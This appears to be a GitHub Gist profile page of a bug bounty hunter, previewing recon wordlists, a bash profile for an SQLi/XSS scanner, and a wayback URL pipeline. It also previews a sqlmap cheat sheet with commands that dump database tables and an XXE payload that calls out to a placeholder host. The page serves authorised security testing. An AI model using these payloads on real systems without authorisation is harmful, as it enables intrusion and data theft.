Skip to content

Instantly share code, notes, and snippets.

View Spy0x7's full-sized avatar
💢
BrainFuck ;)

Nasur Ullah Spy0x7

💢
BrainFuck ;)
67 followers · 230 following
View GitHub Profile
@Spy0x7
Spy0x7 / JavascriptRecon.md
Created July 29, 2021 06:00
My Javascript Recon Process - BugBounty

Description

This is a simple guide to perform javascript recon in the bugbounty

Steps

  • The first step is to collect possibly several javascript files (more files = more paths,parameters -> more vulns)
@Spy0x7
Spy0x7 / subdomain_wordlist.md
Created July 24, 2021 07:40 — forked from cihanmehmet/subdomain_wordlist.md
Subdomain Wordlist
@Spy0x7
Spy0x7 / .bash_profile
Created March 18, 2021 16:43 — forked from dwisiswant0/.bash_profile
SQLi & XSS Vulnerability Scanner
###
# ▶ go get -u github.com/lc/gau
# ▶ go get -u github.com/tomnomnom/qsreplace
# ▶ go get -u github.com/tomnomnom/hacks/kxss
# ▶ go get -u github.com/hahwul/dalfox
# ▶ git clone https://github.com/dwisiswant0/DSSS
###
gauq() {
@Spy0x7
Spy0x7 / sqlmap-cheat-sheet.md
Created March 7, 2021 08:53 — forked from jkullick/sqlmap-cheat-sheet.md
SQLMap Cheat Sheet 
# Enumerate databases
sqlmap --dbms=mysql -u "$URL" --dbs

# Enumerate tables
sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" --tables

# Dump table data
sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" -T "$TABLE" --dump
@Spy0x7
Spy0x7 / CGI fuzzing.txt
Created February 9, 2021 14:42 — forked from saurabh96216/CGI fuzzing.txt
CGI wordlist
TiVoConnect?Command=QueryServer
TiVoConnect?Command=QueryContainer&Container=/&Recurse=Yes
cgi-bin/cart32.exe
cgi-bin/classified.cgi
cgi-bin/download.cgi
cgi-bin/flexform.cgi
cgi-bin/flexform
cgi-bin/lwgate.cgi
cgi-bin/LWGate.cgi
cgi-bin/lwgate
@Spy0x7
Spy0x7 / XXE_payloads
Created December 8, 2020 19:42 — forked from staaldraad/XXE_payloads
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@Spy0x7
Spy0x7 / Unique wayback url
Created September 6, 2020 18:46 — forked from dubey-amit/Unique wayback url
Get all the Wayback endpoints to compare it with your Burp crawled URLs & probe all the unique endpoints.
cat urls | unfurl -u format %s://%d%p > unique && sort -uo unique unique && cat unique | unfurl -u domains | waybackurls | unfurl -u format %s://%d%p > wayurl && sort -uo wayurl wayurl | comm -1 -3 unique wayurl > final && rm urls && rm unique && rm wayurl && httpx -l final --status-code -silent --content-length | grep -i 200
@Spy0x7
Spy0x7 / content-types.txt
Created September 6, 2020 18:45 — forked from BuffaloWill/content-types.txt
Content-Type Dictionary Bruteforcing
# from https://svn.apache.org/repos/asf/httpd/httpd/trunk/docs/conf/mime.types
application/1d-interleaved-parityfec
application/3gpdash-qoe-report+xml
application/3gpp-ims+xml
application/a2l
application/activemessage
application/alto-costmap+json
application/alto-costmapfilter+json
application/alto-directory+json
@Spy0x7
Spy0x7 / .bashrc
Created September 3, 2020 14:52 — forked from mbround18/.bashrc
Personal bashrc
#--------------------------------------------------------------------------------------------
# if found on gist use `git clone https://gist.github.com/650d59476b86fbe885e66af953099006.git .`
# this is a modified version of Emmanuel Rouat [no-email] bashrc how to which can be found at
# `http://tldp.org/LDP/abs/html/sample-bashrc.html`
#--------------------------------------------------------------------------------------------
# If not running interactively, don't do anything
[ -z "$PS1" ] && return
#-------------------------------------------------------------
@Spy0x7
Spy0x7 / List of API endpoints & objects
Created August 28, 2020 05:49 — forked from yassineaboukir/List of API endpoints & objects
A list of 3203 common API endpoints and objects designed for fuzzing.
0
00
01
02
03
1
1.0
10
100
1000